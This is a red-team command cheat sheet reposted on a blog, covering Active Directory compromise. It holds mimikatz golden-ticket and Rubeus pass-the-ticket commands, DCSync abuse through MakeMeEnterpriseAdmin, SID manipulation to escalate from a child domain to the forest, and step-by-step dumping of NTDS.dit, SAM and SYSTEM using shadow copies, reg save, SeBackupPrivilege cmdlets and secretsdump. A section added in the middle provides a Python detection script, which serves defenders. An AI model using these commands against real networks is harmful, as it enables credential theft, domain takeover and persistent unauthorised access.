# Check my Blog Post Kerberos Attacks in Depth for Further Information
#https://m0chan.github.io/Kerberos-Attacks-In-Depth

# Generate a TGT using the NTLM hash
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name>

# Generate a TGT using the AES 128 key
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name>

# Generate a TGT using the AES 256 key (stronger encryption, potentially stealthier since it is Microsoft's default)
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name>

# Inject the TGT with Mimikatz
mimikatz # kerberos::ptt <ticket_kirbi_file>


# Inject the ticket with Rubeus
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

.\PsExec.exe -accepteula \\<remote_hostname> cmd

DCSync and Golden Ticket in one

# https://raw.githubusercontent.com/vletoux/MakeMeEnterpriseAdmin/master/MakeMeEnterpriseAdmin.ps1


This script abuses DCSync rights to extract the krbtgt password and automatically generates a golden ticket before finally importing it into the current session.

You can then add yourself to the Domain Admins/Enterprise Admins group for persistence.

.\MakeMeEnterpriseAdmin.ps1

Child domain to forest compromise

Domain = Logical group of objects (users, computers, servers etc etc) supported from a central location like a DC

Tree = Set of domains using same name space (DNS Name)

Trust = Agreement between 2 domains that allow cross-domain access to resources etc. i/e Michelle@dev.m0chan.com may be able to access resources inside HR.m0chan.com.

Forest = Largest Structure composed of all trees.

Most trees are linked with dual sided trust relationships to allow for sharing of resources.

By default the first domain created is the Forest Root.

Lets say we have owned a domain controller and got the KRBTGT Hash (The keys to the castle) we can now create

Convert-NameToSid target.domain.com\krbtgt
S-1-5-21-2941561648-383941485-1389968811-502

Replace 502 with 519 to represent Enterprise Admins

Create golden ticket and attack parent domain.


This will not work if there is SID Filtering in place for respective target domain.

harmj0ys article explains it best.

#http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/

Dump NTDS.dit

vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[DISK_NUMBER]\windows\ntds\ntds.dit .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[DISK_NUMBER]\windows\system32\config\SYSTEM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[DISK_NUMBER]\windows\system32\config\SAM .
reg SAVE HKLM\SYSTEM c:\SYS
vssadmin delete shadows /for= [/oldest | /all | /shadow=]


If you pwn a BackupOperator account with SeBackupPrivilege you can also dump NTDS.dit

Dump NTDS.dit via backup privilege

Import-Module .\SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll

PS C:\m0chan> Get-SeBackupPrivilege
SeBackupPrivilege is disabled

PS C:\m0chan> Set-SeBackupPrivilege

PS C:\m0chan> Get-SeBackupPrivilege
SeBackupPrivilege is enabled

PS C:\m0chan> Copy-FileSeBackupPrivilege P:\Windows\System32\ntds.dit C:\m0chan\ntds.dit -Overwrite
Copied 12582912 bytes

Use diskshadow to mount a shadow copy and then copy Windows\system32\ntds.dit

Remember not to use C:\Windows\ntds\ntds.dit

reg.exe save hklm\system c:\m0chan\SYSTEM.bak
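Every way of copying a locked credential store shown in these notes (esentutl /vss, reg save of the SAM/SYSTEM/SECURITY hives over WinRM, vssadmin shadow copies, diskshadow, Copy-FileSeBackupPrivilege) goes through a process creation that command-line auditing records. The example below is added here and is not from the original notes: it runs a small rule set over constructed process-creation records (4688 / Sysmon EventID 1 style); the image paths and account names are hypothetical.

```python
"""Flag command lines that copy locked credential stores (registry hives,
NTDS.dit) in constructed process-creation records."""
import re

# Each rule is (name, regex over the lower-cased command line).
RULES = [
    ("vss-shadow-create", re.compile(r"\bvssadmin(\.exe)?\s+create\s+shadow\b")),
    ("diskshadow", re.compile(r"\bdiskshadow(\.exe)?\b")),
    ("esentutl-vss-copy", re.compile(r"\besentutl(\.exe)?\b.*\s/vss\b")),
    ("reg-save-hive", re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b")),
    ("shadow-copy-hive", re.compile(
        r"harddiskvolumeshadowcopy\d+\\.*\\(ntds\.dit|config\\(sam|system|security))")),
    ("sebackup-copy", re.compile(r"\bcopy-filesebackupprivilege\b")),
]

# Constructed sample records (not real log data).
EVENTS = [
    {"user": "CORP\\svc_backup", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": r"vssadmin create shadow /for=C:"},
    {"user": "CORP\\svc_backup", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit ."},
    {"user": "CORP\\jdoe", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg save hklm\sam c:\temp\sam.save"},
    {"user": "CORP\\jdoe", "image": r"C:\Windows\System32\esentutl.exe",
     "cmdline": r"C:\WINDOWS\system32\esentutl.exe /y C:\Windows\System32\config\SAM /vss /d C:\temp\sam"},
    {"user": "CORP\\alice", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"},
    {"user": "CORP\\svc_backup", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell Copy-FileSeBackupPrivilege P:\Windows\System32\ntds.dit C:\tmp\ntds.dit -Overwrite"},
]


def classify(cmdline):
    """Return the names of every rule the command line matches (empty if benign)."""
    low = cmdline.lower()
    return [name for name, rx in RULES if rx.search(low)]


def find_dumps(events):
    """Return [(user, image, [rule names])] for records matching at least one rule."""
    hits = []
    for ev in events:
        names = classify(ev["cmdline"])
        if names:
            hits.append((ev["user"], ev["image"], names))
    return hits


if __name__ == "__main__":
    for hit in find_dumps(EVENTS):
        print(hit)
```

Backup software does produce some of these command lines legitimately, so pair the rule hits with the account and host (a backup service account on a backup server is expected, a user account on a domain controller is not).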

SecretsDump for Windows

#https://github.com/maaaaz/impacket-examples-windows
secretsdump.exe -ntds ~/Extract/ntds.dit -system ~/Extract/SYSTEM -hashes lmhash:nthash LOCAL -outputfile ntlm-extract

https://sh1yan.top/2024/06/02/Windows-Command-Notes-Collection-hacktoday-net-20201201/
Author: shiyan
Published: June 2, 2024